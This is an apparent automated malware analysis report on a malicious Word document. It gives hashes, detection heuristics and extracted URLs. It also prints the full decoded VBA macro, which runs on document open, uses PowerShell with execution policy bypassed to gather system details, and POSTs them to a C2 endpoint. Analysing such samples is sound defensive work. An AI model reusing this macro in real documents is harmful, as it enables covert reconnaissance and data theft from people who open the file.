Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 823c4e860326c790…

MALICIOUS

Office (OOXML) / .DOCX

17.9 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-27
MD5: 162d7073316f7b6d00ff1715851327a1 SHA-1: 63ba249dad8fd9a2b1a39cff9fb49334b402b341 SHA-256: 823c4e860326c79022fc401bd9d579b44143a666a9e1eb767c8fac4f4412ec2d
290 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set xY12b = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        dE56f = xY12b.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).Version""").StdOut.ReadLine
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Set xY12b = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xY12b = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://c2server.com/endpoint Referenced by macro
    • http://c2server.com/endpoint�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1626 bytes
SHA-256: 4b6bc5ad9020ad53ec8a05882d3f762c56754c2547adf66f17ddaeb268c59832
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    
    Dim xY12b As Object
    Dim aB34c As Object
    Dim dE56f As String
    Dim gH78i As String
    Dim jK90l As String
    Dim mN01o As String
    Dim pQ23r As String
    
    ' Execute PowerShell to gather system information
    Set xY12b = CreateObject("WScript.Shell")
    dE56f = xY12b.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).Version""").StdOut.ReadLine
    gH78i = xY12b.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_OperatingSystem).OSArchitecture""").StdOut.ReadLine
    jK90l = xY12b.Exec("powershell.exe -ExecutionPolicy Bypass -Command ""(Get-WmiObject Win32_ComputerSystem).Name""").StdOut.ReadLine
    
    ' Format the data into URL-encoded form data
    mN01o = "osVersion=" & dE56f & "&osArchitecture=" & gH78i & "&computerName=" & jK90l
    pQ23r = Replace(Replace(mN01o, " ", "%20"), "&", "%26")
    
    ' Send the data to the C2 server using HTTP POST
    Set aB34c = CreateObject("MSXML2.XMLHTTP")
    aB34c.Open "POST", "http://c2server.com/endpoint", False
    aB34c.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    aB34c.send "data=" & pQ23r
    
    ' Clean up
    Set xY12b = Nothing
    Set aB34c = Nothing
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 378dd866edd8d5eb902d4550283ff7e95622fcd2080e807438d222a5fd2adb81

Open this report in the interactive analyzer, or submit your own file for analysis.